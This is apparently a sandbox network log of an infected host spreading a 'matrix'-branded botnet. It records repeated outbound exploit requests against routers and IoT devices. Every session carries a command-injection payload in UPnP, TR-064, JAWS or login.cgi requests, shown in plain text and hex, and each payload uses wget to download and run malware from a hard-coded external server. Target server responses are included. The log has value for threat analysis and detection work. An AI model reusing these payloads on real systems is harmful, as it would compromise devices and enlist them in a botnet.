                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:00.528234005 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:26.643341064 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        549192.168.2.135682437.37.170.727547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:35.627146006 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:39.788295984 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        550192.168.2.134483623.220.58.21980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:35.665563107 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:35.828322887 CET438INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 216
                                                        Expires: Thu, 21 Mar 2024 04:22:35 GMT
                                                        Date: Thu, 21 Mar 2024 04:22:35 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 37 26 23 34 36 3b 37 38 30 38 63 36 34 32 26 23 34 36 3b 31 37 31 30 39 39 34 39 35 35 26 23 34 36 3b 30 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1>Your browser sent a request that this server could not understand.<P>Reference&#32;&#35;7&#46;7808c642&#46;1710994955&#46;0</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        551192.168.2.135644218.238.86.19480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:35.665622950 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:35.831162930 CET927INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"><TITLE>ERROR: The request could not be satisfied</TITLE


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        552192.168.2.134297280.156.90.9980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:35.679400921 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        553192.168.2.135090895.78.67.1547547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:35.740509033 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:35.973979950 CET197INHTTP/1.1 404 Not Found
                                                        Date: Thu Mar 21 11:22:35 2024
                                                        Server: tr069 http server
                                                        Content-Length: 15
                                                        Connection: close
                                                        Content-Type: text/plain; charset=ISO-8859-1
                                                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: File not found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        554192.168.2.1343102212.68.11.5480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:35.923372984 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:36.154931068 CET469INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:22:36 GMT
                                                        Server: Apache/2.4.37 (Red Hat Enterprise Linux) OpenSSL/1.1.1k mod_fcgid/2.3.9
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        555192.168.2.1360128212.83.183.3480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:36.091883898 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:36.635298967 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:37.164249897 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:38.190300941 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:38.358683109 CET495INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:22:38 GMT
                                                        Server: Apache/2.4.41 (Ubuntu)
                                                        Content-Length: 301
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        556192.168.2.1339592212.4.227.22780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:36.154805899 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:37.360268116 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:38.767354012 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:38.943082094 CET404INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:22:38 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        557192.168.2.1358776212.68.43.25080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:36.155313969 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
